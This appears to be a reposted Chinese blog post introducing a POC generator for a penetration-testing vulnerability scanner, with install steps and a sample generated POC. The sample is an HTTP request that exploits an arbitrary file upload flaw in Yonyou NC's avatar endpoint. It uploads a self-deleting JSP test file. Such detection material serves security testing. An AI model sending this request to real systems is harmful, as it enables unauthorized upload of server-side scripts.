前言
Hunting-Rabbit(猎兔):致力于打造渗透测试全流程命令行工具,细化每个过程,让渗透测试的每个过程都看得见摸得着,防止遗漏资产,误报严重而丢失漏洞,同时源码很基础,对初学者有重要参考意义。
简介
本项目为 Hunting-Rabbit 系列项目之一 ,是Hunting-Rabbit-VulScanner 专属POC生成器,致力于最直观简洁的POC编写。
Hunting-Rabbit-VulScanner拥有足够多POC后,再进行发布,欢迎各位使用该工具贡献。当前仅有54个,仓库地址如下:
https://github.com/langsasec/Hunting-Rabbit-POC
项目地址
Github:
https://github.com/langsasec/Hunting-Rabbit-POC-Generator
Gitee:
https://gitee.com/langsasec/Hunting-Rabbit-POC-Generator
截图/演示
生成的POC如下:
{
"vul_name": "用友 NC avatar 任意文件上传",
"level": "高危",
"description": "用友 NC acatar接口存在任意文件上传漏洞,可上传恶意脚本至服务器。",
"product": "用友 NC",
"version": "用友 NC",
"cve": "无",
"reference": "https://mp.weixin.qq.com/s/SS_KVTcomHmWbP5zEvVyMw",
"fixing": "https://blog.csdn.net/qq_36618918/article/details/137913219n1、升级到安全版本n 2、如非必要,禁止公网访问该系统。n 3、设置白名单访问。",
"rule": {
"path": "/uapim/upload/avatar?usercode=qbll&fileType=jsp",
"method": "GET",
"headers": "User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36nConnection: closenContent-Length: 242nAccept-Encoding: gzip, deflate, brnContent-Type: multipart/form-data; boundary=----v6bavojmqudas7g0al2o",
"body": "------v6bavojmqudas7g0al2onContent-Disposition: form-data; name="uploadedfile"; filename="klywwjrrux.jsp"nn<%out.print("lmnpl");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>n------v6bavojmqudas7g0al2o--",
"status_code": "200",
"keywords": "true",
"res_time": ""
},
"operator": {
"author": "浪飒",
"email": "[email protected]",
"github": "https://github.com/langsasec"
}
}
安装和使用
1.拉取代码:
git clone https://github.com/langsasec/Hunting-Rabbit-POC-Generator
2.安装依赖
cd Hunting-Rabbit-POC-Generator && pip install -r requirements.txt
3.Python3运行
python Hunting-Rabbit-POC-Generator.py
4.运行后会生成config.ini配置文件,内容如下,可自行配置
# 请勿删除此行,这是为了用户填写联系信息,你将是POC的贡献者,方便其他用户使用POC时可以互相联系,也可以不填写
Author= 你的名字
Email=邮箱
GitHub=Github地址原文始发于微信公众号(浪飒sec):Hunting-Rabbit系列四:POC-Generator
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论